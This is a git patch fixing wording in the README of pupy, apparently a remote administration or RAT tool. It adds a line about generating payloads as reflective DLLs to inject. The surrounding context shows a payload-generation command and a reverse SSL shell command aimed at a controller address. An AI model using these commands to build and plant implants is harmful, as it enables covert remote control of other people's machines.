From 5ffc734870db944b21401c6ee73702bf2717ebf7 Mon Sep 17 00:00:00 2001 From: n1nj4sec Date: Tue, 22 Sep 2015 08:48:24 +0200 Subject: [PATCH] correction of typo in the README --- README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index f422f8a0..44cbca86 100644 --- a/README.md +++ b/README.md @@ -37,6 +37,7 @@ The clients have been tested on (Windows 7, Windows XP, kali linux, ubuntu, Mac ```bash ./genpayload.py 192.168.0.1 -p 443 -t exe_x86 -o pupyx86.exe ``` +you can also use -t dll_x86 or dll_x64 to generate a reflective DLL and inject/load it by your own means. #### for Linux ```bash pip install rpyc #(or manually copy it if you are not admin) @@ -74,7 +75,7 @@ python reverse_ssl.py 192.168.0.1:443 #####interactive python shell ![screenshot8](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/pyshell.png "screenshot8") -##write a module : example a MsgBox +##example: How to write a MsgBox module first of all write the function/class you want to import on the remote client in the example we create the file pupy/packages/windows/all/pupwinutils/msgbox.py ```python